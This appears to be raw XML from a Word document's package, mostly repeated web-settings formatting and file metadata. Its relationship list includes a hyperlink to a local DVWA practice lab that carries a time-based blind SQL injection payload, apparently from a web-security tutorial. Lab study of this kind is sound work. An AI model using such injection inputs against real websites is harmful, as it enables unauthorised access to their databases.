                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="286090268">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="868493666">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="723916945">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="100879891">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="1576403304">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="800807086">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="110437199">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="786238944">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="1260139431">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="880558619">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="531966363">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                                <w:div w:id="776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59990">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20877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jpeg"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18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jpe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hyperlink" Target="http://www.php.cn/course/868.htm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hyperlink" Target="http://www.test.com/teat.txt" TargetMode="External"/><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jpeg"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1sleep%2850%29&amp;Submit=Subm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jpe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javascript:void(0)" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.jpe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jpe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image" Target="media/image167.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header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jpe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jpeg"/><Relationship Id="rId188"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FF56-5ABF-4DE6-8762-3495C991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7</TotalTime>
  <Pages>150</Pages>
  <Words>11923</Words>
  <Characters>67967</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>566</Lines>
  <Paragraphs>159</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7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zai</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>1017</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-06T06:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-16T03:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>